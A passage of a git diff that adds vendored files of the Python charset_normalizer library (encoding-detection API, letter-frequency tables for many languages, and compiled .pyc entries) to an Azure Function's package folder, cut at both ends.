Oбразованието!'.encode('utf_8')) + >>> best_guess = results.best() + >>> str(best_guess) + 'Bсеки човек има право на образование. Oбразованието!' + +Others methods and usages are available - see the full documentation +at . +:copyright: (c) 2021 by Ahmed TAHRI +:license: MIT, see LICENSE for more details. +""" +import logging + +from .api import from_bytes, from_fp, from_path, normalize +from .legacy import ( + CharsetDetector, + CharsetDoctor, + CharsetNormalizerMatch, + CharsetNormalizerMatches, + detect, +) +from .models import CharsetMatch, CharsetMatches +from .utils import set_logging_handler +from .version import VERSION, __version__ + +__all__ = ( + "from_fp", + "from_path", + "from_bytes", + "normalize", + "detect", + "CharsetMatch", + "CharsetMatches", + "CharsetNormalizerMatch", + "CharsetNormalizerMatches", + "CharsetDetector", + "CharsetDoctor", + "__version__", + "VERSION", + "set_logging_handler", +) + +# Attach a NullHandler to the top level logger by default +# https://docs.python.org/3.3/howto/logging.html#configuring-logging-for-a-library + +logging.getLogger("charset_normalizer").addHandler(logging.NullHandler()) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..3ab68ad Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/__pycache__/api.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/__pycache__/api.cpython-39.pyc new file mode 100644 index 0000000..f9b041f Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/__pycache__/api.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/__pycache__/cd.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/__pycache__/cd.cpython-39.pyc new file mode 100644 index 0000000..13ffd33 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/__pycache__/cd.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/__pycache__/constant.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/__pycache__/constant.cpython-39.pyc new file mode 100644 index 0000000..5b6990e Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/__pycache__/constant.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/__pycache__/legacy.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/__pycache__/legacy.cpython-39.pyc new file mode 100644 index 0000000..e046acb Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/__pycache__/legacy.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/__pycache__/md.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/__pycache__/md.cpython-39.pyc new file mode 100644 index 0000000..358e2af Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/__pycache__/md.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/__pycache__/models.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/__pycache__/models.cpython-39.pyc new file mode 100644 index 0000000..6e54558 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/__pycache__/models.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/__pycache__/utils.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/__pycache__/utils.cpython-39.pyc new file mode 100644 index 0000000..0f3a46c Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/__pycache__/utils.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/__pycache__/version.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/__pycache__/version.cpython-39.pyc new file mode 100644 index 0000000..65b5947 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/__pycache__/version.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/api.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/api.py new file mode 100644 index 0000000..38187d6 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/api.py @@ -0,0 +1,578 @@ +import logging +from os import PathLike +from os.path import basename, splitext +from typing import BinaryIO, List, Optional, Set + +from .cd import ( + coherence_ratio, + encoding_languages, + mb_encoding_languages, + merge_coherence_ratios, +) +from .constant import IANA_SUPPORTED, TOO_BIG_SEQUENCE, TOO_SMALL_SEQUENCE, TRACE +from .md import mess_ratio +from .models import CharsetMatch, CharsetMatches +from .utils import ( + any_specified_encoding, + cut_sequence_chunks, + iana_name, + identify_sig_or_bom, + is_cp_similar, + is_multi_byte_encoding, + should_strip_sig_or_bom, +) + +# Will most likely be controversial +# logging.addLevelName(TRACE, "TRACE") +logger = logging.getLogger("charset_normalizer") +explain_handler = logging.StreamHandler() +explain_handler.setFormatter( + logging.Formatter("%(asctime)s | %(levelname)s | %(message)s") +) + + +def from_bytes( + sequences: bytes, + steps: int = 5, + chunk_size: int = 512, + threshold: float = 0.2, + cp_isolation: List[str] = None, + cp_exclusion: List[str] = None, + preemptive_behaviour: bool = True, + explain: bool = False, +) -> CharsetMatches: + """ + Given a raw bytes sequence, return the best possibles charset usable to render str objects. + If there is no results, it is a strong indicator that the source is binary/not text. + By default, the process will extract 5 blocs of 512o each to assess the mess and coherence of a given sequence. + And will give up a particular code page after 20% of measured mess. Those criteria are customizable at will. + + The preemptive behavior DOES NOT replace the traditional detection workflow, it prioritize a particular code page + but never take it for granted. Can improve the performance. + + You may want to focus your attention to some code page or/and not others, use cp_isolation and cp_exclusion for that + purpose. + + This function will strip the SIG in the payload/sequence every time except on UTF-16, UTF-32. + By default the library does not setup any handler other than the NullHandler, if you choose to set the 'explain' + toggle to True it will alter the logger configuration to add a StreamHandler that is suitable for debugging. + Custom logging format and handler can be set manually. + """ + + if not isinstance(sequences, (bytearray, bytes)): + raise TypeError( + "Expected object of type bytes or bytearray, got: {0}".format( + type(sequences) + ) + ) + + if explain: + previous_logger_level: int = logger.level + logger.addHandler(explain_handler) + logger.setLevel(TRACE) + + length: int = len(sequences) + + if length == 0: + logger.debug("Encoding detection on empty bytes, assuming utf_8 intention.") + if explain: + logger.removeHandler(explain_handler) + logger.setLevel(previous_logger_level or logging.WARNING) + return CharsetMatches([CharsetMatch(sequences, "utf_8", 0.0, False, [], "")]) + + if cp_isolation is not None: + logger.log( + TRACE, + "cp_isolation is set. use this flag for debugging purpose. " + "limited list of encoding allowed : %s.", + ", ".join(cp_isolation), + ) + cp_isolation = [iana_name(cp, False) for cp in cp_isolation] + else: + cp_isolation = [] + + if cp_exclusion is not None: + logger.log( + TRACE, + "cp_exclusion is set. use this flag for debugging purpose. " + "limited list of encoding excluded : %s.", + ", ".join(cp_exclusion), + ) + cp_exclusion = [iana_name(cp, False) for cp in cp_exclusion] + else: + cp_exclusion = [] + + if length <= (chunk_size * steps): + logger.log( + TRACE, + "override steps (%i) and chunk_size (%i) as content does not fit (%i byte(s) given) parameters.", + steps, + chunk_size, + length, + ) + steps = 1 + chunk_size = length + + if steps > 1 and length / steps < chunk_size: + chunk_size = int(length / steps) + + is_too_small_sequence: bool = len(sequences) < TOO_SMALL_SEQUENCE + is_too_large_sequence: bool = len(sequences) >= TOO_BIG_SEQUENCE + + if is_too_small_sequence: + logger.log( + TRACE, + "Trying to detect encoding from a tiny portion of ({}) byte(s).".format( + length + ), + ) + elif is_too_large_sequence: + logger.log( + TRACE, + "Using lazy str decoding because the payload is quite large, ({}) byte(s).".format( + length + ), + ) + + prioritized_encodings: List[str] = [] + + specified_encoding: Optional[str] = ( + any_specified_encoding(sequences) if preemptive_behaviour else None + ) + + if specified_encoding is not None: + prioritized_encodings.append(specified_encoding) + logger.log( + TRACE, + "Detected declarative mark in sequence. Priority +1 given for %s.", + specified_encoding, + ) + + tested: Set[str] = set() + tested_but_hard_failure: List[str] = [] + tested_but_soft_failure: List[str] = [] + + fallback_ascii: Optional[CharsetMatch] = None + fallback_u8: Optional[CharsetMatch] = None + fallback_specified: Optional[CharsetMatch] = None + + results: CharsetMatches = CharsetMatches() + + sig_encoding, sig_payload = identify_sig_or_bom(sequences) + + if sig_encoding is not None: + prioritized_encodings.append(sig_encoding) + logger.log( + TRACE, + "Detected a SIG or BOM mark on first %i byte(s). Priority +1 given for %s.", + len(sig_payload), + sig_encoding, + ) + + prioritized_encodings.append("ascii") + + if "utf_8" not in prioritized_encodings: + prioritized_encodings.append("utf_8") + + for encoding_iana in prioritized_encodings + IANA_SUPPORTED: + + if cp_isolation and encoding_iana not in cp_isolation: + continue + + if cp_exclusion and encoding_iana in cp_exclusion: + continue + + if encoding_iana in tested: + continue + + tested.add(encoding_iana) + + decoded_payload: Optional[str] = None + bom_or_sig_available: bool = sig_encoding == encoding_iana + strip_sig_or_bom: bool = bom_or_sig_available and should_strip_sig_or_bom( + encoding_iana + ) + + if encoding_iana in {"utf_16", "utf_32"} and not bom_or_sig_available: + logger.log( + TRACE, + "Encoding %s wont be tested as-is because it require a BOM. Will try some sub-encoder LE/BE.", + encoding_iana, + ) + continue + + try: + is_multi_byte_decoder: bool = is_multi_byte_encoding(encoding_iana) + except (ModuleNotFoundError, ImportError): + logger.log( + TRACE, + "Encoding %s does not provide an IncrementalDecoder", + encoding_iana, + ) + continue + + try: + if is_too_large_sequence and is_multi_byte_decoder is False: + str( + sequences[: int(50e4)] + if strip_sig_or_bom is False + else sequences[len(sig_payload) : int(50e4)], + encoding=encoding_iana, + ) + else: + decoded_payload = str( + sequences + if strip_sig_or_bom is False + else sequences[len(sig_payload) :], + encoding=encoding_iana, + ) + except (UnicodeDecodeError, LookupError) as e: + if not isinstance(e, LookupError): + logger.log( + TRACE, + "Code page %s does not fit given bytes sequence at ALL. %s", + encoding_iana, + str(e), + ) + tested_but_hard_failure.append(encoding_iana) + continue + + similar_soft_failure_test: bool = False + + for encoding_soft_failed in tested_but_soft_failure: + if is_cp_similar(encoding_iana, encoding_soft_failed): + similar_soft_failure_test = True + break + + if similar_soft_failure_test: + logger.log( + TRACE, + "%s is deemed too similar to code page %s and was consider unsuited already. Continuing!", + encoding_iana, + encoding_soft_failed, + ) + continue + + r_ = range( + 0 if not bom_or_sig_available else len(sig_payload), + length, + int(length / steps), + ) + + multi_byte_bonus: bool = ( + is_multi_byte_decoder + and decoded_payload is not None + and len(decoded_payload) < length + ) + + if multi_byte_bonus: + logger.log( + TRACE, + "Code page %s is a multi byte encoding table and it appear that at least one character " + "was encoded using n-bytes.", + encoding_iana, + ) + + max_chunk_gave_up: int = int(len(r_) / 4) + + max_chunk_gave_up = max(max_chunk_gave_up, 2) + early_stop_count: int = 0 + lazy_str_hard_failure = False + + md_chunks: List[str] = [] + md_ratios = [] + + try: + for chunk in cut_sequence_chunks( + sequences, + encoding_iana, + r_, + chunk_size, + bom_or_sig_available, + strip_sig_or_bom, + sig_payload, + is_multi_byte_decoder, + decoded_payload, + ): + md_chunks.append(chunk) + + md_ratios.append(mess_ratio(chunk, threshold)) + + if md_ratios[-1] >= threshold: + early_stop_count += 1 + + if (early_stop_count >= max_chunk_gave_up) or ( + bom_or_sig_available and strip_sig_or_bom is False + ): + break + except UnicodeDecodeError as e: # Lazy str loading may have missed something there + logger.log( + TRACE, + "LazyStr Loading: After MD chunk decode, code page %s does not fit given bytes sequence at ALL. %s", + encoding_iana, + str(e), + ) + early_stop_count = max_chunk_gave_up + lazy_str_hard_failure = True + + # We might want to check the sequence again with the whole content + # Only if initial MD tests passes + if ( + not lazy_str_hard_failure + and is_too_large_sequence + and not is_multi_byte_decoder + ): + try: + sequences[int(50e3) :].decode(encoding_iana, errors="strict") + except UnicodeDecodeError as e: + logger.log( + TRACE, + "LazyStr Loading: After final lookup, code page %s does not fit given bytes sequence at ALL. %s", + encoding_iana, + str(e), + ) + tested_but_hard_failure.append(encoding_iana) + continue + + mean_mess_ratio: float = sum(md_ratios) / len(md_ratios) if md_ratios else 0.0 + if mean_mess_ratio >= threshold or early_stop_count >= max_chunk_gave_up: + tested_but_soft_failure.append(encoding_iana) + logger.log( + TRACE, + "%s was excluded because of initial chaos probing. Gave up %i time(s). " + "Computed mean chaos is %f %%.", + encoding_iana, + early_stop_count, + round(mean_mess_ratio * 100, ndigits=3), + ) + # Preparing those fallbacks in case we got nothing. + if ( + encoding_iana in ["ascii", "utf_8", specified_encoding] + and not lazy_str_hard_failure + ): + fallback_entry = CharsetMatch( + sequences, encoding_iana, threshold, False, [], decoded_payload + ) + if encoding_iana == specified_encoding: + fallback_specified = fallback_entry + elif encoding_iana == "ascii": + fallback_ascii = fallback_entry + else: + fallback_u8 = fallback_entry + continue + + logger.log( + TRACE, + "%s passed initial chaos probing. Mean measured chaos is %f %%", + encoding_iana, + round(mean_mess_ratio * 100, ndigits=3), + ) + + if not is_multi_byte_decoder: + target_languages: List[str] = encoding_languages(encoding_iana) + else: + target_languages = mb_encoding_languages(encoding_iana) + + if target_languages: + logger.log( + TRACE, + "{} should target any language(s) of {}".format( + encoding_iana, str(target_languages) + ), + ) + + cd_ratios = [] + + # We shall skip the CD when its about ASCII + # Most of the time its not relevant to run "language-detection" on it. + if encoding_iana != "ascii": + for chunk in md_chunks: + chunk_languages = coherence_ratio( + chunk, 0.1, ",".join(target_languages) if target_languages else None + ) + + cd_ratios.append(chunk_languages) + + cd_ratios_merged = merge_coherence_ratios(cd_ratios) + + if cd_ratios_merged: + logger.log( + TRACE, + "We detected language {} using {}".format( + cd_ratios_merged, encoding_iana + ), + ) + + results.append( + CharsetMatch( + sequences, + encoding_iana, + mean_mess_ratio, + bom_or_sig_available, + cd_ratios_merged, + decoded_payload, + ) + ) + + if ( + encoding_iana in [specified_encoding, "ascii", "utf_8"] + and mean_mess_ratio < 0.1 + ): + logger.debug( + "Encoding detection: %s is most likely the one.", encoding_iana + ) + if explain: + logger.removeHandler(explain_handler) + logger.setLevel(previous_logger_level) + return CharsetMatches([results[encoding_iana]]) + + if encoding_iana == sig_encoding: + logger.debug( + "Encoding detection: %s is most likely the one as we detected a BOM or SIG within " + "the beginning of the sequence.", + encoding_iana, + ) + if explain: + logger.removeHandler(explain_handler) + logger.setLevel(previous_logger_level) + return CharsetMatches([results[encoding_iana]]) + + if len(results) == 0: + if fallback_u8 or fallback_ascii or fallback_specified: + logger.log( + TRACE, + "Nothing got out of the detection process. Using ASCII/UTF-8/Specified fallback.", + ) + + if fallback_specified: + logger.debug( + "Encoding detection: %s will be used as a fallback match", + fallback_specified.encoding, + ) + results.append(fallback_specified) + elif ( + (fallback_u8 and fallback_ascii is None) + or ( + fallback_u8 + and fallback_ascii + and fallback_u8.fingerprint != fallback_ascii.fingerprint + ) + or (fallback_u8 is not None) + ): + logger.debug("Encoding detection: utf_8 will be used as a fallback match") + results.append(fallback_u8) + elif fallback_ascii: + logger.debug("Encoding detection: ascii will be used as a fallback match") + results.append(fallback_ascii) + + if results: + logger.debug( + "Encoding detection: Found %s as plausible (best-candidate) for content. With %i alternatives.", + results.best().encoding, # type: ignore + len(results) - 1, + ) + else: + logger.debug("Encoding detection: Unable to determine any suitable charset.") + + if explain: + logger.removeHandler(explain_handler) + logger.setLevel(previous_logger_level) + + return results + + +def from_fp( + fp: BinaryIO, + steps: int = 5, + chunk_size: int = 512, + threshold: float = 0.20, + cp_isolation: List[str] = None, + cp_exclusion: List[str] = None, + preemptive_behaviour: bool = True, + explain: bool = False, +) -> CharsetMatches: + """ + Same thing than the function from_bytes but using a file pointer that is already ready. + Will not close the file pointer. + """ + return from_bytes( + fp.read(), + steps, + chunk_size, + threshold, + cp_isolation, + cp_exclusion, + preemptive_behaviour, + explain, + ) + + +def from_path( + path: PathLike, + steps: int = 5, + chunk_size: int = 512, + threshold: float = 0.20, + cp_isolation: List[str] = None, + cp_exclusion: List[str] = None, + preemptive_behaviour: bool = True, + explain: bool = False, +) -> CharsetMatches: + """ + Same thing than the function from_bytes but with one extra step. Opening and reading given file path in binary mode. + Can raise IOError. + """ + with open(path, "rb") as fp: + return from_fp( + fp, + steps, + chunk_size, + threshold, + cp_isolation, + cp_exclusion, + preemptive_behaviour, + explain, + ) + + +def normalize( + path: PathLike, + steps: int = 5, + chunk_size: int = 512, + threshold: float = 0.20, + cp_isolation: List[str] = None, + cp_exclusion: List[str] = None, + preemptive_behaviour: bool = True, +) -> CharsetMatch: + """ + Take a (text-based) file path and try to create another file next to it, this time using UTF-8. + """ + results = from_path( + path, + steps, + chunk_size, + threshold, + cp_isolation, + cp_exclusion, + preemptive_behaviour, + ) + + filename = basename(path) + target_extensions = list(splitext(filename)) + + if len(results) == 0: + raise IOError( + 'Unable to normalize "{}", no encoding charset seems to fit.'.format( + filename + ) + ) + + result = results.best() + + target_extensions[0] += "-" + result.encoding # type: ignore + + with open( + "{}".format(str(path).replace(filename, "".join(target_extensions))), "wb" + ) as fp: + fp.write(result.output()) # type: ignore + + return result # type: ignore diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/assets/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/assets/__init__.py new file mode 100644 index 0000000..129c424 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/assets/__init__.py @@ -0,0 +1,1122 @@ +# -*- coding: utf_8 -*- +from typing import Dict, List + +FREQUENCIES: Dict[str, List[str]] = { + "English": [ + "e", + "a", + "t", + "i", + "o", + "n", + "s", + "r", + "h", + "l", + "d", + "c", + "u", + "m", + "f", + "p", + "g", + "w", + "y", + "b", + "v", + "k", + "x", + "j", + "z", + "q", + ], + "German": [ + "e", + "n", + "i", + "r", + "s", + "t", + "a", + "d", + "h", + "u", + "l", + "g", + "o", + "c", + "m", + "b", + "f", + "k", + "w", + "z", + "p", + "v", + "ü", + "ä", + "ö", + "j", + ], + "French": [ + "e", + "a", + "s", + "n", + "i", + "t", + "r", + "l", + "u", + "o", + "d", + "c", + "p", + "m", + "é", + "v", + "g", + "f", + "b", + "h", + "q", + "à", + "x", + "è", + "y", + "j", + ], + "Dutch": [ + "e", + "n", + "a", + "i", + "r", + "t", + "o", + "d", + "s", + "l", + "g", + "h", + "v", + "m", + "u", + "k", + "c", + "p", + "b", + "w", + "j", + "z", + "f", + "y", + "x", + "ë", + ], + "Italian": [ + "e", + "i", + "a", + "o", + "n", + "l", + "t", + "r", + "s", + "c", + "d", + "u", + "p", + "m", + "g", + "v", + "f", + "b", + "z", + "h", + "q", + "è", + "à", + "k", + "y", + "ò", + ], + "Polish": [ + "a", + "i", + "o", + "e", + "n", + "r", + "z", + "w", + "s", + "c", + "t", + "k", + "y", + "d", + "p", + "m", + "u", + "l", + "j", + "ł", + "g", + "b", + "h", + "ą", + "ę", + "ó", + ], + "Spanish": [ + "e", + "a", + "o", + "n", + "s", + "r", + "i", + "l", + "d", + "t", + "c", + "u", + "m", + "p", + "b", + "g", + "v", + "f", + "y", + "ó", + "h", + "q", + "í", + "j", + "z", + "á", + ], + "Russian": [ + "о", + "а", + "е", + "и", + "н", + "с", + "т", + "р", + "в", + "л", + "к", + "м", + "д", + "п", + "у", + "г", + "я", + "ы", + "з", + "б", + "й", + "ь", + "ч", + "х", + "ж", + "ц", + ], + "Japanese": [ + "の", + "に", + "る", + "た", + "は", + "ー", + "と", + "し", + "を", + "で", + "て", + "が", + "い", + "ン", + "れ", + "な", + "年", + "ス", + "っ", + "ル", + "か", + "ら", + "あ", + "さ", + "も", + "り", + ], + "Portuguese": [ + "a", + "e", + "o", + "s", + "i", + "r", + "d", + "n", + "t", + "m", + "u", + "c", + "l", + "p", + "g", + "v", + "b", + "f", + "h", + "ã", + "q", + "é", + "ç", + "á", + "z", + "í", + ], + "Swedish": [ + "e", + "a", + "n", + "r", + "t", + "s", + "i", + "l", + "d", + "o", + "m", + "k", + "g", + "v", + "h", + "f", + "u", + "p", + "ä", + "c", + "b", + "ö", + "å", + "y", + "j", + "x", + ], + "Chinese": [ + "的", + "一", + "是", + "不", + "了", + "在", + "人", + "有", + "我", + "他", + "这", + "个", + "们", + "中", + "来", + "上", + "大", + "为", + "和", + "国", + "地", + "到", + "以", + "说", + "时", + "要", + "就", + "出", + "会", + ], + "Ukrainian": [ + "о", + "а", + "н", + "і", + "и", + "р", + "в", + "т", + "е", + "с", + "к", + "л", + "у", + "д", + "м", + "п", + "з", + "я", + "ь", + "б", + "г", + "й", + "ч", + "х", + "ц", + "ї", + ], + "Norwegian": [ + "e", + "r", + "n", + "t", + "a", + "s", + "i", + "o", + "l", + "d", + "g", + "k", + "m", + "v", + "f", + "p", + "u", + "b", + "h", + "å", + "y", + "j", + "ø", + "c", + "æ", + "w", + ], + "Finnish": [ + "a", + "i", + "n", + "t", + "e", + "s", + "l", + "o", + "u", + "k", + "ä", + "m", + "r", + "v", + "j", + "h", + "p", + "y", + "d", + "ö", + "g", + "c", + "b", + "f", + "w", + "z", + ], + "Vietnamese": [ + "n", + "h", + "t", + "i", + "c", + "g", + "a", + "o", + "u", + "m", + "l", + "r", + "à", + "đ", + "s", + "e", + "v", + "p", + "b", + "y", + "ư", + "d", + "á", + "k", + "ộ", + "ế", + ], + "Czech": [ + "o", + "e", + "a", + "n", + "t", + "s", + "i", + "l", + "v", + "r", + "k", + "d", + "u", + "m", + "p", + "í", + "c", + "h", + "z", + "á", + "y", + "j", + "b", + "ě", + "é", + "ř", + ], + "Hungarian": [ + "e", + "a", + "t", + "l", + "s", + "n", + "k", + "r", + "i", + "o", + "z", + "á", + "é", + "g", + "m", + "b", + "y", + "v", + "d", + "h", + "u", + "p", + "j", + "ö", + "f", + "c", + ], + "Korean": [ + "이", + "다", + "에", + "의", + "는", + "로", + "하", + "을", + "가", + "고", + "지", + "서", + "한", + "은", + "기", + "으", + "년", + "대", + "사", + "시", + "를", + "리", + "도", + "인", + "스", + "일", + ], + "Indonesian": [ + "a", + "n", + "e", + "i", + "r", + "t", + "u", + "s", + "d", + "k", + "m", + "l", + "g", + "p", + "b", + "o", + "h", + "y", + "j", + "c", + "w", + "f", + "v", + "z", + "x", + "q", + ], + "Turkish": [ + "a", + "e", + "i", + "n", + "r", + "l", + "ı", + "k", + "d", + "t", + "s", + "m", + "y", + "u", + "o", + "b", + "ü", + "ş", + "v", + "g", + "z", + "h", + "c", + "p", + "ç", + "ğ", + ], + "Romanian": [ + "e", + "i", + "a", + "r", + "n", + "t", + "u", + "l", + "o", + "c", + "s", + "d", + "p", + "m", + "ă", + "f", + "v", + "î", + "g", + "b", + "ș", + "ț", + "z", + "h", + "â", + "j", + ], + "Farsi": [ + "ا", + "ی", + "ر", + "د", + "ن", + "ه", + "و", + "م", + "ت", + "ب", + "س", + "ل", + "ک", + "ش", + "ز", + "ف", + "گ", + "ع", + "خ", + "ق", + "ج", + "آ", + "پ", + "ح", + "ط", + "ص", + ], + "Arabic": [ + "ا", + "ل", + "ي", + "م", + "و", + "ن", + "ر", + "ت", + "ب", + "ة", + "ع", + "د", + "س", + "ف", + "ه", + "ك", + "ق", + "أ", + "ح", + "ج", + "ش", + "ط", + "ص", + "ى", + "خ", + "إ", + ], + "Danish": [ + "e", + "r", + "n", + "t", + "a", + "i", + "s", + "d", + "l", + "o", + "g", + "m", + "k", + "f", + "v", + "u", + "b", + "h", + "p", + "å", + "y", + "ø", + "æ", + "c", + "j", + "w", + ], + "Serbian": [ + "а", + "и", + "о", + "е", + "н", + "р", + "с", + "у", + "т", + "к", + "ј", + "в", + "д", + "м", + "п", + "л", + "г", + "з", + "б", + "a", + "i", + "e", + "o", + "n", + "ц", + "ш", + ], + "Lithuanian": [ + "i", + "a", + "s", + "o", + "r", + "e", + "t", + "n", + "u", + "k", + "m", + "l", + "p", + "v", + "d", + "j", + "g", + "ė", + "b", + "y", + "ų", + "š", + "ž", + "c", + "ą", + "į", + ], + "Slovene": [ + "e", + "a", + "i", + "o", + "n", + "r", + "s", + "l", + "t", + "j", + "v", + "k", + "d", + "p", + "m", + "u", + "z", + "b", + "g", + "h", + "č", + "c", + "š", + "ž", + "f", + "y", + ], + "Slovak": [ + "o", + "a", + "e", + "n", + "i", + "r", + "v", + "t", + "s", + "l", + "k", + "d", + "m", + "p", + "u", + "c", + "h", + "j", + "b", + "z", + "á", + "y", + "ý", + "í", + "č", + "é", + ], + "Hebrew": [ + "י", + "ו", + "ה", + "ל", + "ר", + "ב", + "ת", + "מ", + "א", + "ש", + "נ", + "ע", + "ם", + "ד", + "ק", + "ח", + "פ", + "ס", + "כ", + "ג", + "ט", + "צ", + "ן", + "ז", + "ך", + ], + "Bulgarian": [ + "а", + "и", + "о", + "е", + "н", + "т", + "р", + "с", + "в", + "л", + "к", + "д", + "п", + "м", + "з", + "г", + "я", + "ъ", + "у", + "б", + "ч", + "ц", + "й", + "ж", + "щ", + "х", + ], + "Croatian": [ + "a", + "i", + "o", + "e", + "n", + "r", + "j", + "s", + "t", + "u", + "k", + "l", + "v", + "d", + "m", + "p", + "g", + "z", + "b", + "c", + "č", + "h", + "š", + "ž", + "ć", + "f", + ], + "Hindi": [ + "क", + "र", + "स", + "न", + "त", + "म", + "ह", + "प", + "य", + "ल", + "व", + "ज", + "द", + "ग", + "ब", + "श", + "ट", + "अ", + "ए", + "थ", + "भ", + "ड", + "च", + "ध", + "ष", + "इ", + ], + "Estonian": [ + "a", + "i", + "e", + "s", + "t", + "l", + "u", + "n", + "o", + "k", + "r", + "d", + "m", + "v", + "g", + "p", + "j", + "h", + "ä", + "b", + "õ", + "ü", + "f", + "c", + "ö", + "y", + ], + "Simple English": [ + "e", + "a", + "t", + "i", + "o", + "n", + "s", + "r", + "h", + "l", + "d", + "c", + "m", + "u", + "f", + "p", + "g", + "w", + "b", + "y", + "v", + "k", + "j", + "x", + "z", + "q", + ], + "Thai": [ + "า", + "น", + "ร", + "อ", + "ก", + "เ", + "ง", + "ม", + "ย", + "ล", + "ว", + "ด", + "ท", + "ส", + "ต", + "ะ", + "ป", + "บ", + "ค", + "ห", + "แ", + "จ", + "พ", + "ช", + "ข", + "ใ", + ], + "Greek": [ + "α", + "τ", + "ο", + "ι", + "ε", + "ν", + "ρ", + "σ", + "κ", + "η", + "π", + "ς", + "υ", + "μ", + "λ", + "ί", + "ό", + "ά", + "γ", + "έ", + "δ", + "ή", + "ω", + "χ", + "θ", + "ύ", + ], + "Tamil": [ + "க", + "த", + "ப", + "ட", + "ர", + "ம", + "ல", + "ன", + "வ", + "ற", + "ய", + "ள", + "ச", + "ந", + "இ", + "ண", + "அ", + "ஆ", + "ழ", + "ங", + "எ", + "உ", + "ஒ", + "ஸ", + ], + "Classical Chinese": [ + "之", + "年", + "為", + "也", + "以", + "一", + "人", + "其", + "者", + "國", + "有", + "二", + "十", + "於", + "曰", + "三", + "不", + "大", + "而", + "子", + "中", + "五", + "四", + ], + "Kazakh": [ + "а", + "ы", + "е", + "н", + "т", + "р", + "л", + "і", + "д", + "с", + "м", + "қ", + "к", + "о", + "б", + "и", + "у", + "ғ", + "ж", + "ң", + "з", + "ш", + "й", + "п", + "г", + "ө", + ], +} diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/assets/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/assets/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..04aeea0 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/assets/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/cd.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/cd.py new file mode 100644 index 0000000..36bb43a --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/cd.py @@ -0,0 +1,337 @@ +import importlib +from codecs import IncrementalDecoder +from collections import Counter +from functools import lru_cache +from typing import Dict, List, Optional, Tuple + +from .assets import FREQUENCIES +from .constant import KO_NAMES, LANGUAGE_SUPPORTED_COUNT, TOO_SMALL_SEQUENCE, ZH_NAMES +from .md import is_suspiciously_successive_range +from .models import CoherenceMatches +from .utils import ( + is_accentuated, + is_latin, + is_multi_byte_encoding, + is_unicode_range_secondary, + unicode_range, +) + + +def encoding_unicode_range(iana_name: str) -> List[str]: + """ + Return associated unicode ranges in a single byte code page. + """ + if is_multi_byte_encoding(iana_name): + raise IOError("Function not supported on multi-byte code page") + + decoder = importlib.import_module("encodings.{}".format(iana_name)).IncrementalDecoder # type: ignore + + p: IncrementalDecoder = decoder(errors="ignore") + seen_ranges: Dict[str, int] = {} + character_count: int = 0 + + for i in range(0x40, 0xFF): + chunk: str = p.decode(bytes([i])) + + if chunk: + character_range: 